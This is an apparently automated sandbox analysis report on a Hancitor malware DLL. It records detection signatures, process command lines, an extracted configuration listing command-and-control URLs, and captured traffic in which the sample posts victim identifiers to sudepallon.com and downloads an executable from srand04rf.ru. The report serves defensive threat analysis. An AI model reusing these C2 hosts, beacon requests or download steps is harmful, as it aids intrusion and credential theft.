Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report niberius.dll

Overview

General Information

Sample Name:niberius.dll
Analysis ID:446231
MD5:d22d8bb38cf8d6a5ce6d8be4106350e7
SHA1:02fc51e6572a17f5dbbc32c4e3dd03cca3c51afe
SHA256:4dc9d5ee1debdba0388fbb112d4bbbc01bb782f015e798cced3fc2edb17ac557
Tags:dllHancitorMAN1MoskalvzapoeTA511
Infos:

Most interesting Screenshot:

Detection

Hancitor
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Suspect Svchost Activity
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Hancitor
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
May check the online IP address of the machine
Sigma detected: Suspicious Svchost Process
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Is looking for software installed on the system
PE file contains an invalid checksum
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 580 cmdline: loaddll32.exe 'C:\Users\user\Desktop\niberius.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 476 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\niberius.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 2988 cmdline: rundll32.exe 'C:\Users\user\Desktop\niberius.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • svchost.exe (PID: 5480 cmdline: C:\Windows\System32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
    • rundll32.exe (PID: 4156 cmdline: rundll32.exe C:\Users\user\Desktop\niberius.dll,Exercisefound MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4692 cmdline: rundll32.exe C:\Users\user\Desktop\niberius.dll,Forwardlow MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 2492 cmdline: rundll32.exe C:\Users\user\Desktop\niberius.dll,More MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4708 cmdline: rundll32.exe C:\Users\user\Desktop\niberius.dll,Overhuge MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5972 cmdline: rundll32.exe 'C:\Users\user\Desktop\niberius.dll',ONOQWPYIEIR MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 3704 cmdline: rundll32.exe 'C:\Users\user\Desktop\niberius.dll',VKHFWVNHPFTVX MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

Threatname: Hancitor

{"Campaign Id": "0707_wvcr", "C2 list": ["http://sudepallon.com/8/forum.php", "http://anspossthrly.ru/8/forum.php", "http://thentabecon.ru/8/forum.php"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.488456292.0000000004434000.00000002.00020000.sdmpJoeSecurity_HancitorYara detected HancitorJoe Security
    00000003.00000003.338747871.0000000000D10000.00000040.00000001.sdmpJoeSecurity_HancitorYara detected HancitorJoe Security
      00000002.00000003.339351013.0000000000660000.00000040.00000001.sdmpJoeSecurity_HancitorYara detected HancitorJoe Security
        00000005.00000003.363092172.00000000004F0000.00000040.00000001.sdmpJoeSecurity_HancitorYara detected HancitorJoe Security
          00000003.00000002.488244690.0000000002E54000.00000002.00020000.sdmpJoeSecurity_HancitorYara detected HancitorJoe Security
            Click to see the 11 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.3.rundll32.exe.664392.0.unpackJoeSecurity_HancitorYara detected HancitorJoe Security
              2.3.rundll32.exe.664392.0.unpackHancitorHancitor Payloadkevoreilly
              • 0x56f:$decrypt3: 8B 45 FC 33 D2 B9 08 00 00 00 F7 F1 8B 45 08 0F BE 0C 10 8B 55 08 03 55 FC 0F BE 02 33 C1 8B 4D ...
              2.3.rundll32.exe.664392.0.raw.unpackJoeSecurity_HancitorYara detected HancitorJoe Security
                2.3.rundll32.exe.664392.0.raw.unpackHancitorHancitor Payloadkevoreilly
                • 0x116f:$decrypt3: 8B 45 FC 33 D2 B9 08 00 00 00 F7 F1 8B 45 08 0F BE 0C 10 8B 55 08 03 55 FC 0F BE 02 33 C1 8B 4D ...
                6.3.rundll32.exe.4f44392.0.unpackJoeSecurity_HancitorYara detected HancitorJoe Security
                  Click to see the 33 entries

                  Sigma Overview

                  System Summary:

                  barindex
                  Sigma detected: Suspect Svchost ActivityShow sources
                  Source: Process startedAuthor: David Burkett: Data: Command: C:\Windows\System32\svchost.exe, CommandLine: C:\Windows\System32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: rundll32.exe 'C:\Users\user\Desktop\niberius.dll',#1, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 2988, ProcessCommandLine: C:\Windows\System32\svchost.exe, ProcessId: 5480
                  Sigma detected: Suspicious Svchost ProcessShow sources
                  Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\System32\svchost.exe, CommandLine: C:\Windows\System32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: rundll32.exe 'C:\Users\user\Desktop\niberius.dll',#1, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 2988, ProcessCommandLine: C:\Windows\System32\svchost.exe, ProcessId: 5480

                  Jbx Signature Overview

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection:

                  barindex
                  Found malware configurationShow sources
                  Source: 00000003.00000003.338747871.0000000000D10000.00000040.00000001.sdmpMalware Configuration Extractor: Hancitor {"Campaign Id": "0707_wvcr", "C2 list": ["http://sudepallon.com/8/forum.php", "http://anspossthrly.ru/8/forum.php", "http://thentabecon.ru/8/forum.php"]}
                  Multi AV Scanner detection for domain / URLShow sources
                  Source: srand04rf.ruVirustotal: Detection: 13%Perma Link
                  Source: pospvisis.comVirustotal: Detection: 12%Perma Link
                  Multi AV Scanner detection for submitted fileShow sources
                  Source: niberius.dllVirustotal: Detection: 9%Perma Link
                  Source: 15.2.rundll32.exe.4ba0000.1.unpackAvira: Label: TR/Hijacker.Gen
                  Source: 3.2.rundll32.exe.2e50000.2.unpackAvira: Label: TR/Hijacker.Gen
                  Source: 14.2.rundll32.exe.4430000.2.unpackAvira: Label: TR/Hijacker.Gen

                  Location Tracking:

                  barindex
                  Yara detected HancitorShow sources
                  Source: Yara matchFile source: 2.3.rundll32.exe.664392.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.3.rundll32.exe.664392.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.3.rundll32.exe.4f44392.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.rundll32.exe.d14392.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.3.rundll32.exe.dd4392.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.loaddll32.exe.1504392.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.3.rundll32.exe.634392.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.3.rundll32.exe.4f4392.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.3.rundll32.exe.634392.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.3.rundll32.exe.dd4392.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.rundll32.exe.d14392.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.rundll32.exe.2e50000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.rundll32.exe.4ba0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.loaddll32.exe.1504392.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.3.rundll32.exe.4ca4392.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.3.rundll32.exe.4f4392.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.3.rundll32.exe.4f44392.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.3.rundll32.exe.4ca4392.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.rundll32.exe.4430000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000E.00000002.488456292.0000000004434000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.338747871.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.339351013.0000000000660000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.363092172.00000000004F0000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.488244690.0000000002E54000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000003.441877348.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.371171215.0000000001500000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000003.368759303.0000000004F40000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.355295800.0000000000630000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.488676401.0000000004BA4000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000003.443699128.0000000004CA0000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4156, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5972, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4708, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2988, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 3704, type: MEMORY
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E52CD0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E52D78 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E52D55 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E52D17 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E52D98 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0040BAB5 CryptUnprotectData,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04432CD0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04432D55 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04432D78 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04432D17 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04432D98 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04BA2CD0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04BA2D98 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04BA2D17 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04BA2D78 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04BA2D55 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,
                  Source: niberius.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                  Source: Binary string: c:\equate\717\862\Kil\Turn\design.pdb source: rundll32.exe, 00000003.00000002.488380273.0000000002E7D000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.488557122.000000000445D000.00000002.00020000.sdmp, rundll32.exe, 0000000F.00000002.488753613.0000000004BCD000.00000002.00020000.sdmp, niberius.dll

                  Networking:

                  barindex
                  Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                  Source: TrafficSnort IDS: 2031074 ET TROJAN Win32/Ficker Stealer Activity 95.213.179.67:80 -> 192.168.2.3:49727
                  Source: TrafficSnort IDS: 2031132 ET TROJAN Win32/Ficker Stealer Activity M3 192.168.2.3:49727 -> 95.213.179.67:80
                  Source: TrafficSnort IDS: 2031074 ET TROJAN Win32/Ficker Stealer Activity 95.213.179.67:80 -> 192.168.2.3:49788
                  Source: TrafficSnort IDS: 2031132 ET TROJAN Win32/Ficker Stealer Activity M3 192.168.2.3:49788 -> 95.213.179.67:80
                  C2 URLs / IPs found in malware configurationShow sources
                  Source: Malware configuration extractorURLs: http://sudepallon.com/8/forum.php
                  Source: Malware configuration extractorURLs: http://anspossthrly.ru/8/forum.php
                  Source: Malware configuration extractorURLs: http://thentabecon.ru/8/forum.php
                  May check the online IP address of the machineShow sources
                  Source: C:\Windows\SysWOW64\rundll32.exeDNS query: name: api.ipify.org
                  Source: C:\Windows\SysWOW64\rundll32.exeDNS query: name: api.ipify.org
                  Source: C:\Windows\SysWOW64\rundll32.exeDNS query: name: api.ipify.org
                  Source: C:\Windows\SysWOW64\svchost.exeDNS query: name: api.ipify.org
                  Source: C:\Windows\SysWOW64\svchost.exeDNS query: name: api.ipify.org
                  Source: C:\Windows\SysWOW64\svchost.exeDNS query: name: api.ipify.org
                  Source: C:\Windows\SysWOW64\rundll32.exeDNS query: name: api.ipify.org
                  Source: C:\Windows\SysWOW64\rundll32.exeDNS query: name: api.ipify.org
                  Source: C:\Windows\SysWOW64\rundll32.exeDNS query: name: api.ipify.org
                  Source: C:\Windows\SysWOW64\rundll32.exeDNS query: name: api.ipify.org
                  Source: C:\Windows\SysWOW64\rundll32.exeDNS query: name: api.ipify.org
                  Source: C:\Windows\SysWOW64\rundll32.exeDNS query: name: api.ipify.org
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 09 Jul 2021 01:11:14 GMTContent-Type: application/octet-streamContent-Length: 272910Connection: keep-aliveLast-Modified: Wed, 09 Jun 2021 16:00:40 GMTETag: "60c0e5a8-42a0e"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 00 00 00 00 00 2a 04 00 00 00 00 00 e0 00 2f 03 0b 01 02 1e 00 50 03 00 00 26 04 00 00 06 00 00 80 14 00 00 00 10 00 00 00 60 03 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 80 04 00 00 04 00 00 81 81 04 00 02 00 00 01 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 50 04 00 a4 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 9b 03 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 52 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 4f 03 00 00 10 00 00 00 50 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 38 00 00 00 00 60 03 00 00 02 00 00 00 54 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 a8 2d 00 00 00 70 03 00 00 2e 00 00 00 56 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2f 34 00 00 00 00 00 00 14 90 00 00 00 a0 03 00 00 92 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 62 73 73 00 00 00 00 40 04 00 00 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 69 64 61 74 61 00 00 a4 0e 00 00 00 50 04 00 00 10 00 00 00 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 38 00 00 00 00 60 04 00 00 02 00 00 00 26 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 70 04 00 00 02 00 00 00 28 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Source: Joe Sandbox ViewIP Address: 23.21.173.155 23.21.173.155
                  Source: Joe Sandbox ViewIP Address: 23.21.224.49 23.21.224.49
                  Source: Joe Sandbox ViewIP Address: 77.222.42.67 77.222.42.67
                  Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
                  Source: Joe Sandbox ViewASN Name: SWEB-ASRU SWEB-ASRU
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: GET /7hfjsdfjks.exe HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: srand04rf.ruCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: GET /?format=xml HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.ipify.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
